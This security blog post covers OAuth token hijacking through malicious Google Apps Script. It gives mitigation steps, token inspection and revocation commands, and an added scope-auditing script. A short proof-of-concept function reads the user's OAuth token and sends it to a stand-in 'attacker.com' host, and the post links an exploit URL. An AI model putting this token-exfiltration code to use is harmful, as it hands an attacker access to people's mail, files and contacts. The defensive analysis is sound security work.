Google Apps Script is a powerful tool for automating workflows across Google services, but a severe vulnerability exposes users to OAuth token hijacking. Attackers can exploit this flaw to gain unauthorized access to sensitive data, including emails, Drive files, contacts, and more—all with a single click.
You Should Know:
How the Exploit Works
- Malicious Script Injection: An attacker tricks a user into authorizing and running a Google Apps Script that requests excessive OAuth scopes.
- Token Theft: The script silently reads the OAuth token it was granted and sends it to the attacker, who then holds persistent access for as long as the token (and the underlying grant) stays valid.
- Data Exfiltration: The stolen token allows access to:
    - Google Drive (Docs, Sheets, Forms)
    - Gmail (send emails, read inbox)
    - Google Contacts
    - Google Chat/Group conversations
    - Google Classroom data
Proof-of-Concept Code
    function maliciousAuth() {
      // getOAuthToken() returns the token for whatever scopes the user
      // already granted this script; the script never asks again.
      const token = ScriptApp.getOAuthToken();
      UrlFetchApp.fetch("https://attacker.com/steal?token=" + token);
    }
Mitigation Steps
1. Review Script Permissions:
    - Always audit scripts before granting access.
    - Use `https://script.google.com/home/permissions` to revoke suspicious tokens.
2. Limit OAuth Scopes:
    - Avoid scripts requesting unnecessary permissions (e.g., `https://www.googleapis.com/auth/drive`).
3. Monitor Token Activity:
    - Check `https://myaccount.google.com/security` for unusual access.
4. Use Google Workspace Policies:
    - Admins should restrict third-party app integrations via admin.google.com.
Linux/Windows Commands for Token Analysis
- Check Active Tokens (Linux):
    curl -s "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=TOKEN" | jq .
- Revoke Tokens (Windows PowerShell):
    Invoke-WebRequest -Uri "https://accounts.google.com/o/oauth2/revoke?token=TOKEN" -Method Post
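The "Limit OAuth Scopes" step and the tokeninfo check above both come down to the same question: which scopes does a script hold, and are they broader than its job requires? The following is an added example, not code from the original post or from Google. It audits two inputs a Workspace defender actually has in hand: an Apps Script manifest (`appsscript.json`), where an explicit `oauthScopes` list is how a script author opts out of the broad scopes Apps Script otherwise infers from the APIs the code calls, and a tokeninfo response of the kind the `curl` command prints. The scope URLs are real Google OAuth scopes; the sample manifest, the sample tokeninfo document, the function names and the risk tiers are constructed for this example.

```javascript
// Added example (not part of the original post). Audits Apps Script manifests
// and tokeninfo responses for over-broad OAuth scopes. Scope URLs are real
// Google scopes; the sample inputs and the risk model are constructed here.

// The scope UrlFetchApp needs. A script holding this scope plus any data
// scope can copy data out of the account, which is exactly the PoC pattern.
const EXTERNAL_REQUEST = "https://www.googleapis.com/auth/script.external_request";

// Broad scopes mapped to the narrower scope that usually suffices.
const BROAD_SCOPES = {
  "https://www.googleapis.com/auth/drive": "https://www.googleapis.com/auth/drive.file",
  "https://mail.google.com/": "https://www.googleapis.com/auth/gmail.send",
  "https://www.googleapis.com/auth/gmail.modify": "https://www.googleapis.com/auth/gmail.readonly",
  "https://www.googleapis.com/auth/contacts": "https://www.googleapis.com/auth/contacts.readonly",
};

// Scopes that expose no user data by themselves.
const NON_DATA_SCOPES = new Set([
  EXTERNAL_REQUEST,
  "https://www.googleapis.com/auth/userinfo.email",
  "https://www.googleapis.com/auth/userinfo.profile",
]);

// Core check shared by both audits. Risk tiers (constructed for the example):
//   high   - can reach external hosts AND holds a data scope (exfiltration path)
//   medium - holds a broad scope, or can reach external hosts without data
//   low    - narrow scopes only, no outbound channel
function auditScopes(scopes) {
  const broad = scopes
    .filter((s) => Object.prototype.hasOwnProperty.call(BROAD_SCOPES, s))
    .map((s) => ({ scope: s, narrower: BROAD_SCOPES[s] }));
  const canExfiltrate = scopes.includes(EXTERNAL_REQUEST);
  const touchesData = scopes.some((s) => !NON_DATA_SCOPES.has(s));
  let risk = "low";
  if (canExfiltrate && touchesData) risk = "high";
  else if (broad.length > 0 || canExfiltrate) risk = "medium";
  return { scopes, broad, canExfiltrate, touchesData, risk };
}

// Audit an appsscript.json object. A missing oauthScopes list means Apps
// Script infers scopes from API usage (typically the broad forms), so the
// manifest alone cannot prove least privilege; report that as "unknown".
function auditManifest(manifest) {
  const explicitScopes = Array.isArray(manifest.oauthScopes);
  const result = auditScopes(explicitScopes ? manifest.oauthScopes : []);
  return { ...result, explicitScopes, risk: explicitScopes ? result.risk : "unknown" };
}

// Audit a tokeninfo response. Its `scope` field is a space-separated string.
function auditTokenInfo(info) {
  const scopes = typeof info.scope === "string" ? info.scope.split(/\s+/).filter(Boolean) : [];
  const result = auditScopes(scopes);
  return { ...result, email: info.email || null, expiresIn: info.expires_in ?? null };
}

// Human-readable summary for a console or ticket.
function report(label, result) {
  const lines = [`${label}: risk=${result.risk}`];
  if (result.explicitScopes === false) lines.push("  no explicit oauthScopes in manifest; scopes will be inferred");
  for (const b of result.broad) lines.push(`  broad scope ${b.scope} -> consider ${b.narrower}`);
  if (result.canExfiltrate) lines.push("  script.external_request present: outbound fetch possible");
  return lines.join("\n");
}

// Constructed sample inputs.
const SAMPLE_MANIFEST = {
  timeZone: "Etc/UTC",
  runtimeVersion: "V8",
  oauthScopes: [
    "https://www.googleapis.com/auth/drive.file",
    "https://www.googleapis.com/auth/userinfo.email",
  ],
};
const SAMPLE_TOKENINFO = {
  issued_to: "example-client-id.apps.googleusercontent.com",
  scope: [
    "https://www.googleapis.com/auth/drive",
    "https://mail.google.com/",
    EXTERNAL_REQUEST,
    "https://www.googleapis.com/auth/userinfo.email",
  ].join(" "),
  expires_in: 3200,
  email: "user@example.com",
  access_type: "offline",
};

console.log(report("manifest", auditManifest(SAMPLE_MANIFEST)));
console.log(report("tokeninfo", auditTokenInfo(SAMPLE_TOKENINFO)));
```

The sample manifest audits as low risk because it pins narrow scopes and has no outbound channel; the sample tokeninfo audits as high because it combines full Drive and full Gmail access with `script.external_request`, the same combination the proof-of-concept above relies on. Sending scopes such as `gmail.send` are a second outbound channel not modelled here; extend `EXTERNAL_REQUEST` into a set if that matters for your tenant.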
What Undercode Say
Google’s dismissal of this flaw as a “trust issue” is alarming. OAuth hijacking undermines data integrity across Workspace ecosystems. Ethical hackers must push for stricter scope validation and user education. Meanwhile, sysadmins should enforce least-privilege principles and monitor script executions.
Links:
- Exploit URL: https://lnkd.in/gWu2g2B2
- Google OAuth Docs: https://developers.google.com/identity/protocols/oauth2
- Token Revocation: https://myaccount.google.com/permissions
References:
Reported By: Phhitachi Googlevrp – Hackers Feeds